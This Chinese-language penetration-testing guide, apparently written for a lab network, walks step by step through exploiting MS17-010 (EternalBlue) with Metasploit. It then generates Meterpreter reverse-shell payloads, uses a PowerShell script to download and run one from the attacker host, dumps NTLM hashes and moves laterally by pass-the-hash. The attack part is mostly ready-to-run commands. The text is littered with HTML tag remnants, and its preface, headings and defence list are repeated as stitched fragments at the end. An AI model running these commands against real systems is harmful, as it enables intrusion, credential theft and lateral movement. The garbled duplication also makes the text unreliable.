MS17-010 (EternalBlue) 漏洞利用与渗透测试完整指南<\/h1>

0x00 前言<\/h2>
本教学文档详细记录了针对MS17-010 (EternalBlue)漏洞的完整渗透测试流程，从信息收集到漏洞利用，再到后渗透阶段的操作。该漏洞是Windows SMBv1服务器中的一个远程代码执行漏洞(CVE-2017-0143)，风险等级为高危。<\/p>

0x01 实验环境<\/h2>

目标网络<\/strong>: 10.11.1.0\/24<\/li>
攻击机<\/strong>: Kali Linux (IP: 10.11.0.79)<\/li>

工具集<\/strong>: Nmap, Metasploit Framework, msfvenom, pth-winexe<\/li> <\/ul>
0x02 信息收集阶段<\/h2>
1. 扫描开放SMB服务的主机<\/h3>
nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.txt <\/span><\/span><\/code><\/pre>提取Windows主机IP:<\/p> cat smb_service.txt | grep -i windows | cut -d" "<\/span> -f2 <\/span><\/span><\/code><\/pre>提取所有开放SMB服务的主机IP:<\/p> cat smb_service.txt | grep -i open | cut -d" "<\/span> -f2 > smb_server_all.txt <\/span><\/span><\/code><\/pre>2. 扫描存在SMB漏洞的主机<\/h3> 查找可用的SMB漏洞扫描脚本:<\/p> find \/ -name smb*vuln*.nse <\/span><\/span><\/code><\/pre>批量扫描所有SMB漏洞:<\/p> for<\/span> vul in $(<\/span>find \/ -name smb*vuln*.nse | cut -d"\/"<\/span> -f 6)<\/span>; do<\/span> <\/span><\/span> nmap -v -p 139,445 --script=<\/span>$vul -iL smb_server_all.txt -oN smb_vulns_$vul.txt; <\/span><\/span>done<\/span> <\/span><\/span><\/code><\/pre>查看发现的漏洞:<\/p> cat smb_vulns_smb-vuln-*.txt | grep IDs: <\/span><\/span><\/code><\/pre>0x03 漏洞利用阶段<\/h2> 1. 验证MS17-010漏洞<\/h3> nmap -v -p 139,445 --script=<\/span>smb-vuln-ms17-010.nse -iL smb_server_all.txt -oN smb_vulns_smb-vuln-ms17-010.nse.txt <\/span><\/span><\/code><\/pre>2. 使用Metasploit进行攻击<\/h3> 启动Metasploit并配置EternalBlue模块:<\/p> msfconsole <\/span><\/span>use exploit\/windows\/smb\/ms17_010_eternalblue <\/span><\/span>show options <\/span><\/span><\/code><\/pre>设置目标IP并执行攻击:<\/p> set RHOST 10.11.1.220 <\/span><\/span>exploit <\/span><\/span><\/code><\/pre>成功标志: 获得nt authority\system<\/code>权限的shell<\/p> 0x04 后渗透阶段<\/h2> 1. 系统信息收集<\/h3> 检查系统版本:<\/p> dir c:\ <\/span><\/span><\/span><\/code><\/pre>2. 生成Meterpreter Payload<\/h3> 64位Windows Payload:<\/p> msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=<\/span><攻击机IP> LPORT=<\/span><监听端口> -f exe -a x64 --platform win -o mp_64.exe <\/span><\/span><\/code><\/pre>32位Windows Payload:<\/p> msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span><攻击机IP> LPORT=<\/span><监听端口> -f exe -a x86 --platform win -o mp_86.exe <\/span><\/span><\/code><\/pre>3. 设置监听器<\/h3> use exploit\/multi\/handler <\/span><\/span>set payload windows\/x64\/meterpreter\/reverse_tcp <\/span><\/span>set LHOST 10.11.0.79 <\/span><\/span>set LPORT 8080<\/span> <\/span><\/span>run <\/span><\/span><\/code><\/pre>4. 上传并执行Payload<\/h3> 在目标机器上创建PowerShell下载脚本:<\/p> echo $storageDir=$pwd > wget.ps1 <\/span><\/span>echo $webclient=New-Object System.Net.WebClient >>wget.ps1 <\/span><\/span>echo $url="http:\/\/10.11.0.79\/payload\/mp_64.exe"<\/span> >>wget.ps1 <\/span><\/span>echo $file="mp_64.exe"<\/span> >>wget.ps1 <\/span><\/span>echo $webclient.DownloadFile($url,$file) >>wget.ps1 <\/span><\/span><\/code><\/pre>执行脚本并运行payload:<\/p> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File<\/span> wget.ps1 <\/span><\/span>mp_64.exe <\/span><\/span><\/code><\/pre>5. Meterpreter操作<\/h3> 常用命令:<\/p> screenshot<\/code>: 截取屏幕<\/li> hashdump<\/code>: 导出密码哈希<\/li> shell<\/code>: 获取系统shell<\/li> getsystem<\/code>: 提权<\/li> <\/ul> 示例哈希导出结果:<\/p> Administrator:500:aad3b435b51404eeaad3b435b51404ee:0598acedc0122622ad85afc9e66d329e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: <\/code><\/pre> 0x05 Pass The Hash攻击<\/h2> 使用获取的NTLM哈希进行认证:<\/p> export SMBHASH=<\/span>aad3b435b51404eeaad3b435b51404ee:0598acedc0122622ad85afc9e66d329e <\/span><\/span>pth-winexe -U Administrator% \/\/10.11.1.220 cmd <\/span><\/span><\/code><\/pre>0x06 渗透测试流程总结<\/h2> 信息收集<\/strong>: 使用Nmap扫描开放SMB服务的主机<\/li> 漏洞扫描<\/strong>: 使用Nmap脚本扫描特定SMB漏洞<\/li> 漏洞验证<\/strong>: 确认MS17-010漏洞存在<\/li> 漏洞利用<\/strong>: 使用Metasploit的EternalBlue模块攻击<\/li> 权限提升<\/strong>: 获得system权限<\/li> 后渗透<\/strong>: 生成Meterpreter payload<\/li> 上传并执行payload<\/li> 获取稳定会话<\/li> 导出密码哈希<\/li> <\/ul> <\/li> 横向移动<\/strong>: 使用Pass The Hash技术<\/li> <\/ol> 0x07 注意事项<\/h2> 实际环境中，某些主机可能因为架构不匹配而攻击失败<\/li> 确保payload架构与目标系统匹配(32位\/64位)<\/li> 在企业环境中进行渗透测试前必须获得书面授权<\/li> 测试完成后应清理痕迹，删除上传的文件<\/li> 该漏洞影响Windows 7\/Server 2008 R2及更早版本，确保打上MS17-010补丁<\/li> <\/ol> 0x08 防御措施<\/h2> 禁用SMBv1协议<\/li> 及时安装安全更新<\/li> 启用网络级认证(NLA)<\/li> 配置防火墙规则限制SMB端口(139\/445)的访问<\/li> 使用网络分割限制SMB通信范围<\/li> <\/ol>

MS17-010 (EternalBlue) 漏洞利用与渗透测试完整指南<\/h1>

0x00 前言<\/h2> 本教学文档详细记录了针对MS17-010 (EternalBlue)漏洞的完整渗透测试流程，从信息收集到漏洞利用，再到后渗透阶段的操作。该漏洞是Windows SMBv1服务器中的一个远程代码执行漏洞(CVE-2017-0143)，风险等级为高危。<\/p>

0x02 信息收集阶段<\/h2>

0x03 漏洞利用阶段<\/h2>

0x08 防御措施<\/h2> 禁用SMBv1协议<\/li> 及时安装安全更新<\/li> 启用网络级认证(NLA)<\/li> 配置防火墙规则限制SMB端口(139\/445)的访问<\/li> 使用网络分割限制SMB通信范围<\/li> <\/ol>

0x00 前言<\/h2>
本教学文档详细记录了针对MS17-010 (EternalBlue)漏洞的完整渗透测试流程，从信息收集到漏洞利用，再到后渗透阶段的操作。该漏洞是Windows SMBv1服务器中的一个远程代码执行漏洞(CVE-2017-0143)，风险等级为高危。<\/p>

0x08 防御措施<\/h2>

禁用SMBv1协议<\/li>
及时安装安全更新<\/li>
启用网络级认证(NLA)<\/li>
配置防火墙规则限制SMB端口(139\/445)的访问<\/li>
使用网络分割限制SMB通信范围<\/li> <\/ol>